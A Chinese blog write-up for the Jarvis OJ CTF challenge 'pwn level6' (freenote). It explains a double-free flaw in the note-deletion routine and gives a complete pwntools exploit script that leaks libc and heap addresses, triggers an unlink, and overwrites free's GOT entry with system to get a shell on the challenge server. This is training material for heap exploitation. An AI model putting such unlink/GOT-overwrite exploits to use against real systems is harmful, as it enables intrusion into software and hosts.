jarvisoj pwn level6 writeup

最新推荐文章于 2022-03-13 11:03:24 发布
最新推荐文章于 2022-03-13 11:03:24 发布
阅读量1.7k 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/79123634
版权

考完试了,又开始做题

这题是一道很好的用来熟悉堆的题

首先先确定漏洞的地方是delete note

漏洞有两个
1. 没有校验对应的堆是否有free
2. delete完之后没有把指向堆的指针清除

所以可以利用double free,触发unlink,达到任意内存修改的目的

具体怎么利用在https://www.cnblogs.com/0xJDchen/p/6195919.html 里面说得很清楚

但是里面有些东西可以改进,那就是,可以只构造两个堆,还有一点地方就是,这里获取的libc地址要减去一个固定的偏移,才能到代码段,但是本地的服务器的偏移和本地是不同的,这里可以用list_note把free地址给泄漏出来,但这里用的是第一种

import struct
from pwn import *

debug=1
if debug:
    p=process('./freenote')
    context.log_level='debug'
    gdb.attach(proc.pidof(p)[0])
    e=ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    p=remote('pwn2.jarvisoj.com', 9885)
    context.log_level='debug'
    e=ELF('./libc.so')


def list_note():
    p.sendline('1')
    content=p.recvuntil('==')
    return content[:-2]

def new_note(content):
    p.sendline('2')
    p.recvuntil('Length of new note: ')
    p.sendline(str(len(content)))
    p.recvuntil('Enter your note:')
    p.send(content)
    p.recvuntil('Your choice:')

def edit_note(index,content):
    p.sendline('3')
    p.recvuntil('Note number: ')
    p.sendline(str(index))
    p.recvuntil('Length of note: ')
    p.sendline(str(len(content)))
    p.recvuntil('Enter your note: ')
    p.send(content)
    p.recvuntil('Your choice:')

def delete_note(index):
    p.sendline('4')
    p.recvuntil('Note number: ')
    p.sendline(str(index))
    p.recvuntil('Your choice:')


new_note('A'*0x80)
new_note('B'*0x80)
new_note('C'*0x80)
new_note('D'*0x80)

delete_note(0)
new_note('1234')
data=list_note()
d=data.index('1234')+4

#---------leak libc address-----------

libc=struct.unpack('<I',data[d:d+4])[0]
libc=libc-libc%0x1000
libc-=0x1bc000
if debug:
    libc+=0x9000
else:
    libc+=0x11000

delete_note(0)
delete_note(2)

#---------leak heap address-----------

new_note('1234')
data=list_note()
d=data.index('1234')+4
heap=struct.unpack('<I',data[d:d+4])[0]

heap=heap-heap%0x1000


#delete all heap
delete_note(0)
delete_note(1)
delete_note(3)

#构造堆,prev_size是0,当前size是0x80,后面两个是FD、BK,然后补全128位,再构造另外一个堆,prev_size是0x80,当前堆的size是0x80
payload=p32(0)+p32(0x81)+p32(heap+0x18-0xc)+p32(heap+0x18-0x8)
payload=payload.ljust(128,'A')
payload+=p32(0x80)+p32(0x80)+'/bin/sh\x00'
payload=payload.ljust(256,'A')

new_note(payload)
delete_note(1)

im_payload=p32(10)+p32(1)+p32(4)+p32(0x804A29C)+p32(0)*2+p32(heap+0xca8)
im_payload=im_payload.ljust(256,'A')

edit_note(0,im_payload)
edit_note(0,p32(libc+e.symbols['system']))

p.sendline('4')
p.recvuntil('Note number: ')
p.sendline('1')

print(hex(libc))

p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
level6(Jarvis OJ)
weixin_43868725的博客
06-17 353
0x0 程序保护和流程 保护: 流程: main() init_note_pointer() 在note_pointer处存放note的信息,note_pointer[0]代表最多存放256个note,note_pointer[1]代表当前的note数量。 选择1会输出全部的note,选择2会新建一个note,结构为 { flag; //1代表正在使用,反之为0 length; //note的长度 note_pointer; //执行note的指针 } 选择3可以修改note的长度和内
jarvisOJ)(pwnlevel6_x86
PLpa的博客
08-05 430
Unlink!Unlink!Unlink! level6_x86作为一道堆溢出入门题,还是值得用来练练手,学习一下堆的基础的知识的。 参考文献: ctf-wiki:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink-zh/ 大佬博客:https://blog.csdn.net/weixin_41617275/article...
jarvis oj level6
发蝴蝶和大脑斧的博客
01-10 1159
原来的附件有点问题,重新发过了. 主要用了两个技术:1.溢出泄露libc地址,heap地址.2.unsafe_unlink,这个how2pwn上unsafe_unlink.c里写的很清楚. 首先看泄露libc地址 New("A"*0x80)#0 New("B"*0x80)#1 Delete(0) New("123") List() c=p.recvuntil('AAAA') leak_addr=u...
jarvisoj(level6)--unlink
九层台
09-21 1569
unlink其实就是把chunk从bin链中拉出来然后跟前面或者后面的chunk合并。 参考https://ctf-wiki.github.io/ctf-wiki/pwn/linux/heap/unlink/。 则当我们free(Q)时 glibc 判断这个块是 small chunk。 判断前向合并,发现前一个 chunk 处于使用状态,不需要前向合并。 判断后向合并,发现后一个 chunk ...
jarvisOJ Pwn writeup
KGYSaikou的博客
05-10 121
1.level0 checksec一下 64位程序,只开启了堆栈不可执行保护 用IDA打开 主函数非常简单,输出Hello World以后调用vulnerable_function()函数,并返回该函数的返回值 vulnerable_function()函数内定义了一个字符变量buf,用read函数读取字符(串)到buf中 这里我们可以发现,buf的距离rbp的长度为80h,而read可以读取200h个字符,会造...
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
最新发布
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
2020 蓝帽杯线下赛PWN WriteUp .pdf
09-05
本文主要涉及的是网络安全领域的Pwn(利用漏洞攻防)技术,具体是针对2020年蓝帽杯线下赛中的一个Pwn题目进行的WriteUp(解题报告)。Pwn类题目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
HackThis!! Crypt Level 6 WriteUp
三百人委员会
12-16 275
题目: 一段音频, 没有其他提示了. 解题: 听声音听不出来什么类似于莫尔斯电码的东西 想起来以前看到过的题目, 把信息藏在声音频谱中, 于是考虑到用专业软件看它的频谱. 看讨论区的提示,这应该是某种数字编码, 猜测点代表1, 又由于没有出现超过五个的点, 所以横线应该代表5, 但是那个眼睛一样的东西没办法解决. 去谷歌找类似的编码文字, 发现是玛雅文字, 表现方式和我猜的一样, 那个眼睛一样...
jarvisoj)(pwn)guestbook2/level6_x64
PLpa的博客
08-28 1116
guestbook2和level6_x64真的是一摸一样的,两个题目除了提示文字不同,其他的漏洞根本一样,鉴于jarvisoj中的pwn服务器比pwn2服务器要稳定一点,所以这里就写guestbook2。 前言: 这里,我提供两种方法解题,一种是利用unlink的任意地址读写功能泄露libc基址,一种是用unsorted bin和use after free来泄露libc基址,两种方法都行。 漏洞...
jarvis oj pwn hiphop writeup
charlie_heng的专栏
01-24 370
这题真的感觉挺新颖的 首先说下这题的漏洞是什么 条件竞争! 一开始我看到这题是懵逼的,为什么好像常规的下标越界,缓冲区越界之类的都没有 然后其中一个功能又非常奇怪,要开线程? 然后看到这个函数里面某个地方一大堆sleep,于是就猜是条件竞争了 这题是打boss,然后每次都会随机一下出招,只要能预测出出招是什么就能防御 然后回想起以前打pwnable的一题,也是同样靠本地的时间与服务器
jarvisoj pwn level系列
weixin_45551695的博客
05-26 191
某重新入坑的小白试图学会如何打pwn 从现在开始,个人计划也就开始了,希望能走下去吧, 先看看blibli这个基础的 CTF pwn 小白基础课 后面的UP主后面有,讲得浅显易懂 有基础有能力有时间的可以看看这个人 我不认识他但是货很干,很厉害,可以看看他的博客 然后 不多说,来搞事情 做题网站 level0 首先,下下来这个东东 拿到程序后先file可知为64位程序和动态链接 cheksec一下检查保护机制 我们能看到这个玩意,可以看到是一个只开启了NX的64位linux程序。 Stack:栈保护 R
jarvis oj pwn
qq_44813849的博客
07-24 221
先附上一段大佬的总结,接着再说题。 栈溢出的基本套路: 找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接 构建shellcode,用一句话就行shellcode = asm(shellcraft.sh()) 构建payload,payload...
Jarvis OJ pwn刷题
清霂的博客
03-26 250
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
JarvisOJ pwn (一)
dezang2878的博客
04-13 109
0x 01 XMAN_level0常规的跟进函数,查看漏洞函数 可以看到函数里定义了一个字符变量他在栈中存放的位置是rsp-80h,而下面的read语句却允许我们输入最多512字节的数据,buf的首地址到rbp也就是栈帧的底部都才只有128个字,所以我们完全可以通过read函数来覆盖此函数的返回地址。然后就是查找程序中有没有可以用来攻击的程序或者语句 这里可以看到...
jarvisoj_level6_x64
z1r0的博客
03-13 667
jarvisoj_level6_x64 查看保护 这一类保护的堆题基本上就是申请到堆控制的地址,改got表 进ida直接奔delete这里去了,一枚uaf 第二个漏洞在这里edit可以申请size 攻击思路:这一题可以看到堆的size和是否释放都放在了一个地方,看了一下保护就可以知道大概的思路了。申请到管理堆的地方,然后填充入got表输出libc,改got为system。 注意:这里申请的是unstroted bin大小的堆块!!! 1.首先肯定是先要泄露libc,这一题可以使用unlink来解决,一
jarvis guestbook2 / level6_x64
发蝴蝶和大脑斧的博客
03-12 842
level6思路相同,只是在x64运行。 遇到几个问题: 1.[DEBUG] Received 0x4e bytes: &quot;*** Error in guestbook2: realloc(): invalid pointer: 0x0000000001dcb018 ***\n&quot; 调试了半天发现是当新块的大小与原来不一致时都会调用realloc,所以要填充的时候要仔细。 2.原本想这样泄漏libc...
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值